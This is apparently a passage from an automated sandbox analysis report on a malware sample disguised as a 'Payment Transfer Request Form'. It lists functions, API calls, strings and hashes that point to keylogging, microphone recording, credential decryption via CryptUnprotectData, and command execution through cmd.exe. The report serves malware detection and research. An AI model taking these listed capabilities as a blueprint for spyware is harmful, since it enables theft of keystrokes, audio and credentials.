                                              • Opcode ID: 655f7a8a6140fe06f74d4810f19312272e80c6b42afcaa61e472fb93c242db7b
                                              • Instruction ID: e15509fa74df4b182af5404410fa86f763612774b1e54c01db9847f8ec559460
                                              • Opcode Fuzzy Hash: 655f7a8a6140fe06f74d4810f19312272e80c6b42afcaa61e472fb93c242db7b
                                              • Instruction Fuzzy Hash: BC31D232A0021AABEF259F66DC45DAF7BA5EF40710F05016AFC04DB291EB39DD51CB98
                                              Function 00401BC9 Relevance: 7.6, APIs: 5, Instructions: 71COMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00401BD9
                                              • waveInOpen.WINMM(0046FAB0,000000FF,0046FA98,Function_00001CEB,00000000,00000000,00000024), ref: 00401C6F
                                              • waveInPrepareHeader.WINMM(0046FA78,00000020), ref: 00401CC3
                                              • waveInAddBuffer.WINMM(0046FA78,00000020), ref: 00401CD2
                                              • waveInStart.WINMM ref: 00401CDE
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                              • String ID:
                                              • API String ID: 1356121797-0
                                              • Opcode ID: a5aa28857088cf9e2c0b2d910deecd96170581a9a307f5b2914fac260bae8331
                                              • Instruction ID: fb7f9cdbf736b3995f9a1dd050f0e4013ef0d97c015e7d4644af59ef24d86031
                                              • Opcode Fuzzy Hash: a5aa28857088cf9e2c0b2d910deecd96170581a9a307f5b2914fac260bae8331
                                              • Instruction Fuzzy Hash: 77212C326242019BC7049FEABD0591A7BA9FB89714740943BF58DD7AB1FBF844098B0E
                                              Function 0044C53A Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetEnvironmentStringsW.KERNEL32 ref: 0044C543
                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044C566
                                                • Part of subcall function 00443649: RtlAllocateHeap.NTDLL(00000000,00433069,?,?,004365E7,?,?,00000000,00473A38,?,0040C88A,00433069,?,?,?,?), ref: 0044367B
                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044C58C
                                              • _free.LIBCMT ref: 0044C59F
                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044C5AE
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                              • String ID:
                                              • API String ID: 336800556-0
                                              • Opcode ID: 55ab520b62cbc01e0d1004e3f78ad65e034532d4f5c4574cc0f3edc3ad35f3b1
                                              • Instruction ID: 9106a42af1dcf347f359e8079d91fbce8cfabd6158495d04cb7d137736bc8ec9
                                              • Opcode Fuzzy Hash: 55ab520b62cbc01e0d1004e3f78ad65e034532d4f5c4574cc0f3edc3ad35f3b1
                                              • Instruction Fuzzy Hash: AD0171726037257F37611AA75CC8C7F7A6DDAC6BA5319016BB904C3201EA79EE0181B8
                                              Function 0040FBC8 Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                                              Download Yara Rule
                                              APIs
                                              • std::_Lockit::_Lockit.LIBCPMT ref: 0040FBD5
                                              • int.LIBCPMT ref: 0040FBE8
                                                • Part of subcall function 0040CAE9: std::_Lockit::_Lockit.LIBCPMT ref: 0040CAFA
                                                • Part of subcall function 0040CAE9: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CB14
                                              • std::_Facet_Register.LIBCPMT ref: 0040FC28
                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 0040FC31
                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 0040FC4F
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                              • String ID:
                                              • API String ID: 2536120697-0
                                              • Opcode ID: e42b24a72f1c346ef2fbe1d3cf240902612692734d8aa84a6b4d17056c7d6fbb
                                              • Instruction ID: 5713401f36b8bb0c26d90e6cd89a0375aabf3697ea4116ccadb9116029d1f595
                                              • Opcode Fuzzy Hash: e42b24a72f1c346ef2fbe1d3cf240902612692734d8aa84a6b4d17056c7d6fbb
                                              • Instruction Fuzzy Hash: 9811C172904118A7CB24EFA5D80289FB778EF44325F10417FFD44B7291DA389E4A87D8
                                              Function 004457A9 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • GetLastError.KERNEL32(?,00000000,?,00439A11,00000000,?,?,00439A95,00000000,00000000,00000000,00000000,00000000,?,?), ref: 004457AE
                                              • _free.LIBCMT ref: 004457E3
                                              • _free.LIBCMT ref: 0044580A
                                              • SetLastError.KERNEL32(00000000), ref: 00445817
                                              • SetLastError.KERNEL32(00000000), ref: 00445820
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ErrorLast$_free
                                              • String ID:
                                              • API String ID: 3170660625-0
                                              • Opcode ID: d4e383c12478905910161cad80a238fc5d6e44a6254b0909f9091c4c9b8107c1
                                              • Instruction ID: 04032910ca93e9be015006ee1c204adc37b37130fda50a8933af11b0a5b4c0b1
                                              • Opcode Fuzzy Hash: d4e383c12478905910161cad80a238fc5d6e44a6254b0909f9091c4c9b8107c1
                                              • Instruction Fuzzy Hash: 4101FE36100F0077FB127B366CC992B15699FC2B7AB21413BF40592293EE7DCC01462D
                                              Function 0044DB9C Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • _free.LIBCMT ref: 0044DBB4
                                                • Part of subcall function 00443C92: HeapFree.KERNEL32(00000000,00000000,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?), ref: 00443CA8
                                                • Part of subcall function 00443C92: GetLastError.KERNEL32(?,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?,?), ref: 00443CBA
                                              • _free.LIBCMT ref: 0044DBC6
                                              • _free.LIBCMT ref: 0044DBD8
                                              • _free.LIBCMT ref: 0044DBEA
                                              • _free.LIBCMT ref: 0044DBFC
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: _free$ErrorFreeHeapLast
                                              • String ID:
                                              • API String ID: 776569668-0
                                              • Opcode ID: 4ff6445dbd1c139c6c118283ff3a35b6f69cd7d79671e775af14f987f4430014
                                              • Instruction ID: 294e589d6328203d0d12509a579114aacc3179ef351d8ef0a61016021d4f39e6
                                              • Opcode Fuzzy Hash: 4ff6445dbd1c139c6c118283ff3a35b6f69cd7d79671e775af14f987f4430014
                                              • Instruction Fuzzy Hash: DDF04F339002146BA620EF6AE9C6C5773D9EE01B15355880AF085E7600EA78FC80965C
                                              Function 00441548 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                              Download Yara Rule
                                              APIs
                                              • _free.LIBCMT ref: 00441566
                                                • Part of subcall function 00443C92: HeapFree.KERNEL32(00000000,00000000,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?), ref: 00443CA8
                                                • Part of subcall function 00443C92: GetLastError.KERNEL32(?,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?,?), ref: 00443CBA
                                              • _free.LIBCMT ref: 00441578
                                              • _free.LIBCMT ref: 0044158B
                                              • _free.LIBCMT ref: 0044159C
                                              • _free.LIBCMT ref: 004415AD
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: _free$ErrorFreeHeapLast
                                              • String ID:
                                              • API String ID: 776569668-0
                                              • Opcode ID: dc25ad9d7c881d5a7498954b547f4469e613371529959f9048218c6a37a16c45
                                              • Instruction ID: 534a9c52bd02544fd4565401bb604a6095318b382a753ef56e7f6fd0a1c42297
                                              • Opcode Fuzzy Hash: dc25ad9d7c881d5a7498954b547f4469e613371529959f9048218c6a37a16c45
                                              • Instruction Fuzzy Hash: 00F030B78052209BD7016F55BC864053BA0BB04B29305853BF8ADE6670FBB90A458F8E
                                              Function 00412446 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 179registryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 004124AD
                                              • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 004124DC
                                              • RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710,?,?,?,?,?,?,?,?), ref: 0041257C
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Enum$InfoQueryValue
                                              • String ID: [regsplt]
                                              • API String ID: 3554306468-4262303796
                                              • Opcode ID: 5841badb2ff9825d46e36e26999fd6152bd29a2a307a84bebb93b53298b167be
                                              • Instruction ID: d2130986b24ed572c5287744f6969716810a156cba9fb87d3bcc7fef363a21f2
                                              • Opcode Fuzzy Hash: 5841badb2ff9825d46e36e26999fd6152bd29a2a307a84bebb93b53298b167be
                                              • Instruction Fuzzy Hash: A6513C71900219AADB10EBA1DD81EEFB7BDEF04304F10016AF505F2191EF786B49CBA8
                                              Function 0044B8C9 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 168COMMON
                                              Download Yara Rule
                                              APIs
                                              • _strpbrk.LIBCMT ref: 0044B918
                                              • _free.LIBCMT ref: 0044BA35
                                                • Part of subcall function 00439AA3: IsProcessorFeaturePresent.KERNEL32(00000017,00439A75,?,?,?,?,?,00000000,?,?,00439A95,00000000,00000000,00000000,00000000,00000000), ref: 00439AA5
                                                • Part of subcall function 00439AA3: GetCurrentProcess.KERNEL32(C0000417), ref: 00439AC7
                                                • Part of subcall function 00439AA3: TerminateProcess.KERNEL32(00000000), ref: 00439ACE
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                              • String ID: *?$.
                                              • API String ID: 2812119850-3972193922
                                              • Opcode ID: 5dfc5c04e88bff774400eef92f9a188e96d7e5ade9dca766e11bbcc0c0b71fd5
                                              • Instruction ID: d7c010aeaec7a8a897f36992f2f7f2874d2ac4fe7d304ea8792e53e8e447d7e7
                                              • Opcode Fuzzy Hash: 5dfc5c04e88bff774400eef92f9a188e96d7e5ade9dca766e11bbcc0c0b71fd5
                                              • Instruction Fuzzy Hash: 9C51C371E002099FEF14DFA9C881AAEB7B5EF48314F24816EE954E7301E779DE018B94
                                              Function 00442B2D Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: __alloca_probe_16__freea
                                              • String ID: H"G$H"GH"G
                                              • API String ID: 1635606685-3036711414
                                              • Opcode ID: 80076ff913fd6fdf96b59eec9a2e877d4b1c448352c335ccfb263d7e6081886f
                                              • Instruction ID: 3c870ea2fb57449e7c992ce38f4d69c2eab2d9a05dd359c3c94aeedaa7d51697
                                              • Opcode Fuzzy Hash: 80076ff913fd6fdf96b59eec9a2e877d4b1c448352c335ccfb263d7e6081886f
                                              • Instruction Fuzzy Hash: F0411931A00212ABEB219F65CD82A5FB7A1EF45714F54056FF804DB291EBBCDD40879E
                                              Function 0040184A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 142threadCOMMON
                                              Download Yara Rule
                                              APIs
                                              • __Init_thread_footer.LIBCMT ref: 0040189E
                                              • ExitThread.KERNEL32 ref: 004018D6
                                              • waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00471E78,00000000), ref: 004019E4
                                                • Part of subcall function 00432525: __onexit.LIBCMT ref: 0043252B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                                              • String ID: 8:G
                                              • API String ID: 1649129571-405301104
                                              • Opcode ID: 6c4170bff86ee992d8df3bdd3d74d8495f38894ad7373b110d99162688207991
                                              • Instruction ID: 6b8457e9d7ea4966c0dd8dde8758560e0d74fde28bba72e74fe0511dc6260a90
                                              • Opcode Fuzzy Hash: 6c4170bff86ee992d8df3bdd3d74d8495f38894ad7373b110d99162688207991
                                              • Instruction Fuzzy Hash: 7941E7325042005BC324FB65DD86EAFB3A9AB84318F40453FF589621F2DF78994ADB5E
                                              Function 00440935 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe,00000104), ref: 00440975
                                              • _free.LIBCMT ref: 00440A40
                                              • _free.LIBCMT ref: 00440A4A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: _free$FileModuleName
                                              • String ID: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe
                                              • API String ID: 2506810119-390386176
                                              • Opcode ID: 85438adf96173c680659750e247b8861d1a9ea07739a925f85de7b4b5d9254a8
                                              • Instruction ID: d1e15b597fe779666310b40bee8bd10d15f5dfa451d6ac01ff045fbeec250af7
                                              • Opcode Fuzzy Hash: 85438adf96173c680659750e247b8861d1a9ea07739a925f85de7b4b5d9254a8
                                              • Instruction Fuzzy Hash: CA31C4B1A00318AFEB21DF99D88199EBBF8EF84314F10406BF544A7311E6B48E55CB59
                                              Function 00419675 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 90COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00412006: RegOpenKeyExW.ADVAPI32(80000000,http\shell\open\command,00000000,00020019,00000000,00472248,00471FFC), ref: 00412030
                                                • Part of subcall function 00412006: RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,?,00000400), ref: 0041204B
                                                • Part of subcall function 00412006: RegCloseKey.ADVAPI32(00000000), ref: 00412054
                                                • Part of subcall function 00419F23: GetCurrentProcess.KERNEL32(?,?,?,0040C663,WinDir,00000000,00000000), ref: 00419F34
                                              • _wcslen.LIBCMT ref: 00419744
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CloseCurrentOpenProcessQueryValue_wcslen
                                              • String ID: .exe$program files (x86)\$program files\
                                              • API String ID: 37874593-1203593143
                                              • Opcode ID: 546b0d98d04e059566fa11c86a24e7130a7516f31b9ccb35c8e0da8d0391a80d
                                              • Instruction ID: a7f24a5d9d5c0dc772ada330bc3383911e5a1e9af4e42701afe0c0cb79e45fb3
                                              • Opcode Fuzzy Hash: 546b0d98d04e059566fa11c86a24e7130a7516f31b9ccb35c8e0da8d0391a80d
                                              • Instruction Fuzzy Hash: CB21B872A001046BDF14BAB6DD968FE37AD9E4831CB04057FF405B32D2ED7D8D5942A9
                                              Function 00409203 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70threadCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateThread.KERNEL32(00000000,00000000,00409305,00472008,00000000,00000000), ref: 0040928B
                                              • CreateThread.KERNEL32(00000000,00000000,004092EF,00472008,00000000,00000000), ref: 0040929B
                                              • CreateThread.KERNEL32(00000000,00000000,00409311,00472008,00000000,00000000), ref: 004092A7
                                                • Part of subcall function 0040A0B0: GetLocalTime.KERNEL32(?,Offline Keylogger Started,00472008), ref: 0040A0BE
                                                • Part of subcall function 0040A0B0: wsprintfW.USER32 ref: 0040A13F
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CreateThread$LocalTimewsprintf
                                              • String ID: Offline Keylogger Started
                                              • API String ID: 465354869-4114347211
                                              • Opcode ID: fcb156bf474100ecd8714675bcdacda6a6d505e445d23128ee173ce543fa6834
                                              • Instruction ID: c8e77f7b3f84bd49b91c3d3ae4e8ac846fef78eef7351f53fb2416b9cb49ddb0
                                              • Opcode Fuzzy Hash: fcb156bf474100ecd8714675bcdacda6a6d505e445d23128ee173ce543fa6834
                                              • Instruction Fuzzy Hash: 3211A7A15003083ED210BB669DD6CBB7A5CDA8139CB40057FF845221C3EAB85D19C6FF
                                              Function 00409E37 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 65threadCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 0040A0B0: GetLocalTime.KERNEL32(?,Offline Keylogger Started,00472008), ref: 0040A0BE
                                                • Part of subcall function 0040A0B0: wsprintfW.USER32 ref: 0040A13F
                                                • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
                                              • CreateThread.KERNEL32(00000000,00000000,004092EF,?,00000000,00000000), ref: 00409EB7
                                              • CreateThread.KERNEL32(00000000,00000000,00409311,?,00000000,00000000), ref: 00409EC3
                                              • CreateThread.KERNEL32(00000000,00000000,0040931D,?,00000000,00000000), ref: 00409ECF
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CreateThread$LocalTime$wsprintf
                                              • String ID: Online Keylogger Started
                                              • API String ID: 112202259-1258561607
                                              • Opcode ID: 3095bb4c8629fd0e670b035ea9b5ccaf12231fc020c32c5bedba700ceaefce21
                                              • Instruction ID: 28bbfba120e67fe9302c314101e9d6be38f8a9d2e5fa49f3fb55d6307d966583
                                              • Opcode Fuzzy Hash: 3095bb4c8629fd0e670b035ea9b5ccaf12231fc020c32c5bedba700ceaefce21
                                              • Instruction Fuzzy Hash: 7F01C4A0A042083AE62076768CD6DBF7A6CCA92398B40047FFA45221C3D9B85C5586FE
                                              Function 00404F31 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58timethreadCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetLocalTime.KERNEL32(?), ref: 00404F61
                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00404FAD
                                              • CreateThread.KERNEL32(00000000,00000000,00405130,?,00000000,00000000), ref: 00404FC0
                                              Strings
                                              • Connection KeepAlive | Enabled | Timeout: , xrefs: 00404F74
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Create$EventLocalThreadTime
                                              • String ID: Connection KeepAlive | Enabled | Timeout:
                                              • API String ID: 2532271599-507513762
                                              • Opcode ID: ecde6dd8490a4419ba9d8f450afdef6f270760df43025f419a01a865904151c8
                                              • Instruction ID: 3880ceca910d84d0b9b3d3001f949c19a9d90d4f91ad2e0c59d2668d569340f7
                                              • Opcode Fuzzy Hash: ecde6dd8490a4419ba9d8f450afdef6f270760df43025f419a01a865904151c8
                                              • Instruction Fuzzy Hash: 4F1127719002806AC720BB769C0DE9B7FA89BD2714F44056FF44123281D6B89445CBBA
                                              Function 00406071 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53libraryloaderCOMMON
                                              Download Yara Rule
                                              APIs
                                              • LoadLibraryA.KERNEL32(crypt32,CryptUnprotectData,?,00000000,00406039,?), ref: 00406090
                                              • GetProcAddress.KERNEL32(00000000), ref: 00406097
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AddressLibraryLoadProc
                                              • String ID: CryptUnprotectData$crypt32
                                              • API String ID: 2574300362-2380590389
                                              • Opcode ID: f0fa7d81e448b8e45dda707d186e5b4dbadcbde3f04206e46648964c8c5bf07c
                                              • Instruction ID: 6e7317174224a8efb10ab03f2076fe60a9434866ae70ffeafd7cb5b8c28562e1
                                              • Opcode Fuzzy Hash: f0fa7d81e448b8e45dda707d186e5b4dbadcbde3f04206e46648964c8c5bf07c
                                              • Instruction Fuzzy Hash: C801F535A04205ABCF18CFA9D8049ABBBB8AB54300F00427FE956E3380D635D904C794
                                              Function 0040513C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46synchronizationCOMMON
                                              Download Yara Rule
                                              APIs
                                              • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00405139), ref: 00405153
                                              • CloseHandle.KERNEL32(?), ref: 004051AA
                                              • SetEvent.KERNEL32(?), ref: 004051B9
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CloseEventHandleObjectSingleWait
                                              • String ID: Connection Timeout
                                              • API String ID: 2055531096-499159329
                                              • Opcode ID: 69bf4708d5eac36444cb13c7d4d8205934b4ecb8f60f6f16827c1b7745a6238b
                                              • Instruction ID: 59ae86e236e2a5bc5991cc3fd82f69d26eb1b9a4ba12329ef82c58e56ff8d0a2
                                              • Opcode Fuzzy Hash: 69bf4708d5eac36444cb13c7d4d8205934b4ecb8f60f6f16827c1b7745a6238b
                                              • Instruction Fuzzy Hash: F901F531A40F40AFE711BB368C4551B7BD4FF01302704097FE19356AA1D6B89800CF49
                                              Function 0040D1F0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 45COMMON
                                              Download Yara Rule
                                              APIs
                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 0040D25E
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Exception@8Throw
                                              • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                              • API String ID: 2005118841-1866435925
                                              • Opcode ID: 07dcd5cdd291a6416836d0c86817599069bcc3367b78dc6d1ec70403740c8f80
                                              • Instruction ID: 5123bbd1fc4d669f1c4d6c1cc045f4f856aea5ad0ec182f95f4946492138bf11
                                              • Opcode Fuzzy Hash: 07dcd5cdd291a6416836d0c86817599069bcc3367b78dc6d1ec70403740c8f80
                                              • Instruction Fuzzy Hash: 0401A261E44208BAD714EAD1C853FBA73689B64705F10806FB911751C2EA7DAA4E862F
                                              Function 004120E8 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42registryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,origmsc), ref: 00412104
                                              • RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,000003E8,?), ref: 0041211D
                                              • RegCloseKey.ADVAPI32(00000000), ref: 00412128
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CloseOpenQueryValue
                                              • String ID: origmsc
                                              • API String ID: 3677997916-68016026
                                              • Opcode ID: d40fef656c83bcaf339f4d5c80b35c3f5e3dd6ef5f24df27a21155112b999244
                                              • Instruction ID: 61f3e32b1c93232b19bf4a4cc48abe95026028d342b1827e6ec6edb2467bbf34
                                              • Opcode Fuzzy Hash: d40fef656c83bcaf339f4d5c80b35c3f5e3dd6ef5f24df27a21155112b999244
                                              • Instruction Fuzzy Hash: 4C014B31800229BBCF219F91DC49DEB7F29EF05761F0141A5BE08A2161D63589BADBA4
                                              Function 00414839 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 42COMMON
                                              Download Yara Rule
                                              APIs
                                              • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 0041487B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ExecuteShell
                                              • String ID: /C $cmd.exe$open
                                              • API String ID: 587946157-3896048727
                                              • Opcode ID: e8ae4e63c9dc0d6232b12cfcea10d76e3d0f37ee2c59ec5f687c9fc8ea61ff61
                                              • Instruction ID: 0094db9d050c86e8b7efcb7c1e993d1de0046a6f7675c6b5aa1ef49a358ded74
                                              • Opcode Fuzzy Hash: e8ae4e63c9dc0d6232b12cfcea10d76e3d0f37ee2c59ec5f687c9fc8ea61ff61
                                              • Instruction Fuzzy Hash: 8FF017712083049BC304FBB5DC91DEFB39CAB90348F50493FB556921E2EE789949C65A
                                              Function 00412006 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 40registryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • RegOpenKeyExW.ADVAPI32(80000000,http\shell\open\command,00000000,00020019,00000000,00472248,00471FFC), ref: 00412030
                                              • RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,?,00000400), ref: 0041204B
                                              • RegCloseKey.ADVAPI32(00000000), ref: 00412054
                                              Strings
                                              • http\shell\open\command, xrefs: 00412026
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CloseOpenQueryValue
                                              • String ID: http\shell\open\command
                                              • API String ID: 3677997916-1487954565
                                              • Opcode ID: b2b53b33f668fea9d6b70683008644784a8f2d8740eef6bc6becda6435671858
